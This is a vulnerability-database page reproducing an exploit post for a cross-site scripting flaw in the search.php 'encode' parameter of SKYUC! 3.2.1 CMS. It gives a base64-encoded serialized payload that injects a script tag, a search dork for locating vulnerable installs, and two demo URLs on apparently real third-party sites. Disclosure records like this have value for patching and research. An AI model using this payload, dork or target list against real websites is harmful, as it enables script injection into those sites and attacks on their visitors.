SKYUC! 3.2.1 Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047602 漏洞类型
发布时间 2012-04-28 更新时间 2012-04-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012040221
|漏洞详情
漏洞细节尚未披露
|漏洞EXP

########################################################################################
#                                                                                      #
# Exploit Title : SKYUC CMS Cross Site Scripting Vulnerability                         #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Vendor        : www.skyuc.com                                                        #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : Low                                                                  #
#                                                                                      #
#  DorK         : "Powered by SKYUC! 3.2.1"                                            #
#                                                                                      #
#                                                                                      #
########################################################################################
#                                                                                      #
#  Expl0iT:                                                                            #
#                                                                                      #
#  http://[TarGeT]/search.php?encode=[XSS] with encryption base64                      #
#                                                                                      #
#  [XSS] :                                                                             #
#
#  YTozOntzOjg6ImNhdGVnb3J5IjtzOjE6IjAiO3M6ODoia2V5d29yZHMiO3M6NDA6IiI%2bPHNjcmlwdD5hbGVydCgvZmFyYm9kbWFoaW5pLyk8L3NjcmlwdD4iO3M6MTg6InNlYXJjaF9lbmNvZGVfdGltZSI7aToxMzI2NDc0MTkxO30=
#                                                                                      #
#                                                                                      #
#  Demo :                                                                              # 
#                                                                                      #
#  http://www.dygq.com/search.php?encode=[xss]                                         #
#  http://www.sistarchina.com/search.php?encode=[xss]                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################